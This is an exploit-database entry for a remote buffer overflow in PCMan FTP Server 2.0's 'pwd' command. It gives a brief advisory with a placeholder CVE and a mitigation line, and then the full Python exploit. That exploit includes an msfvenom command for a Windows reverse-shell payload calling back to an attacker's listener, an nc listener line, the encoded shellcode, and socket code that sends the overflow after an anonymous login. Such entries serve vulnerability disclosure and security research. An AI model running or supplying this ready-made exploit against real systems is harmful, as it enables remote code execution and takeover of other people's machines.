PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow

vendor:

FTP Server

by:

Waqas Ahmed Faroouqi

6.1

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: FTP Server

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: CVE-2023-XXXX

CPE: a:pcman:ftp_server:2.0

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2023

PCMan FTP Server 2.0 – ‘pwd’ Remote Buffer Overflow

The PCMan FTP Server 2.0 is vulnerable to a remote buffer overflow attack. By sending a specially crafted payload to the 'pwd' command, an attacker can exploit this vulnerability to execute arbitrary code on the target system. This vulnerability has been assigned the CVE ID CVE-2023-XXXX.

Mitigation:

To mitigate this vulnerability, users are advised to update to a patched version of the PCMan FTP Server.

Source

Exploit-DB raw data:

# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
# Date: 09/25/2023
# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0
# Tested on: Windows XP SP3

#!/usr/bin/python

import socket

#buffer = 'A' * 2500
#offset = 2007
#badchars=\x00\x0a\x0d
#return_address=0x7e429353 (USER32.dll)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
#nc -nvlp 4444

overflow = (
"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"
"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"
"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"
"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"
"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"
"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"
"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"
"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"
"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"
"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"
"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"
"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"
"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"
"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"
"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"
"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"
"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"                                                                                           
"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"                                                                                                             
"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"                                                                                                             
"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"                                                                                                             
"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"                                                                                                             
"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"                                                                                                             
"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"                                                                                                             
"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"
"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"
"\xd7")

shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow

# Change IP/Port as required  

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
        print "\nSending evil buffer..."
        s.connect(('192.168.146.135',21))
        data = s.recv(1024)
        s.send('USER anonymous' +'\r\n')
        data = s.recv(1024)
        s.send('PASS anonymous\r\n')
        s.send('pwd ' + shellcode + '\r\n')
        s.close()
        print "\nExploit completed successfully!."
except:
        print "Could not connect to FTP!"